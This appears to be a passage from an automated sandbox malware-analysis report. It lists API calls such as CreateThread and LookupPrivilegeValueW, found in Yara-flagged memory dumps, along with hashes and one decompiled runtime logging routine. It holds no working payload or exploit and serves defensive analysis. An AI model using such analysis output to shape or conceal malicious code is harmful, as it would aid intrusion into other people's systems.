                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: a5bb84c520cd5baa846f2ecb85cea0655a35f3fb715c421183178a6356d5db06
                                            • Instruction ID: b6b0abd3dafe91ede66f076457ace7ec9695209e4103bd1bd1e1059f62af0d93
                                            • Opcode Fuzzy Hash: a5bb84c520cd5baa846f2ecb85cea0655a35f3fb715c421183178a6356d5db06
                                            • Instruction Fuzzy Hash: 54F02B367403003BD7316A58CC02FA3B79DDF84B54F500468FB0AAB2C0DAA1B40087D5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02FE8A21, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,02FDCFC2,02FDCFC2,?,00000000,?,?), ref: 02FE8A60
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 25c751f6cea03d52fb19e9ef676e4eab3304c7d1acb5534e7f57743fe7cf092d
                                            • Instruction ID: d6f6fea3849913e2c9bf7ace88d01aa2c2f992774df41e4a8aa667627a231e92
                                            • Opcode Fuzzy Hash: 25c751f6cea03d52fb19e9ef676e4eab3304c7d1acb5534e7f57743fe7cf092d
                                            • Instruction Fuzzy Hash: 9FF0A0B2200114AFDB24CF14CC88EEB7769EF85310F008198FD085B241DA31A810CBB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02FE8A30, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,02FDCFC2,02FDCFC2,?,00000000,?,?), ref: 02FE8A60
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction ID: babf92b216c15565431f8576d29d2a04a48dc144e20a2579a2ce4f3ab227d5af
                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction Fuzzy Hash: 54E01AB12002086BDB14DF49CC84EE737ADAF88650F118554BA0957241C934E8108BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02FE8890, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(02FE3536,?,02FE3CAF,02FE3CAF,?,02FE3536,?,?,?,?,?,00000000,00000000,?), ref: 02FE88BD
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction ID: 63652245422871480451e391417c6a923733e7e3e8514c8f72eec5132149b5c6
                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction Fuzzy Hash: 4BE046B1200208ABDB18EF99CC44EA777ADEF88750F118558FE095B241C630F910CBF0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02FDD430, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,?,02FD7C83,?), ref: 02FDD45B
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                            • Instruction ID: 6213851167a43d8d20ef6a36fdbdd0e8a73637961a89c328b927882f8fbc8d3e
                                            • Opcode Fuzzy Hash: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                            • Instruction Fuzzy Hash: 6AD05E627503083AEA10BAA49C16F2632895B45B84F4940A4FA49972C3DA50F4008561
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0350967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 1c897ee2db56d347445d201729762b60d9fd1a6a45c5e1373bbb2ba1dc5a14b2
                                            • Instruction ID: 7c1c02c2873d27adbde5512fdd7cca6e0fd5314cdf88f375938932410a993785
                                            • Opcode Fuzzy Hash: 1c897ee2db56d347445d201729762b60d9fd1a6a45c5e1373bbb2ba1dc5a14b2
                                            • Instruction Fuzzy Hash: A9B09B719414D5C5E611D760560872B7D5477D0745F16C551D1020647F4779C0D1F5F5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 0355FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 53%
                                            			E0355FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0350CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03555720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03555720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                            0x0355fdda
                                            0x0355fde2
                                            0x0355fde5
                                            0x0355fdec
                                            0x0355fdfa
                                            0x0355fdff
                                            0x0355fe0a
                                            0x0355fe0f
                                            0x0355fe17
                                            0x0355fe1e
                                            0x0355fe19
                                            0x0355fe19
                                            0x0355fe19
                                            0x0355fe20
                                            0x0355fe21
                                            0x0355fe22
                                            0x0355fe25
                                            0x0355fe40

                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0355FDFA
                                            Strings
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0355FE01
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0355FE2B
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                            • API String ID: 885266447-3903918235
                                            • Opcode ID: 74f56852e91d18c4f64d3989ed95483d548df3834b353fbcc9616a6a4913952a
                                            • Instruction ID: a0ece6dfe6f54bd8a847791689212d82da777cb4e188b482f622829e9a962725
                                            • Opcode Fuzzy Hash: 74f56852e91d18c4f64d3989ed95483d548df3834b353fbcc9616a6a4913952a
                                            • Instruction Fuzzy Hash: 02F0FC36140201BFD6215A95EC01F67BF7AFB85770F240716FA245E1E1EA62F86086F4
                                            Uniqueness

                                            Uniqueness Score: -1.00%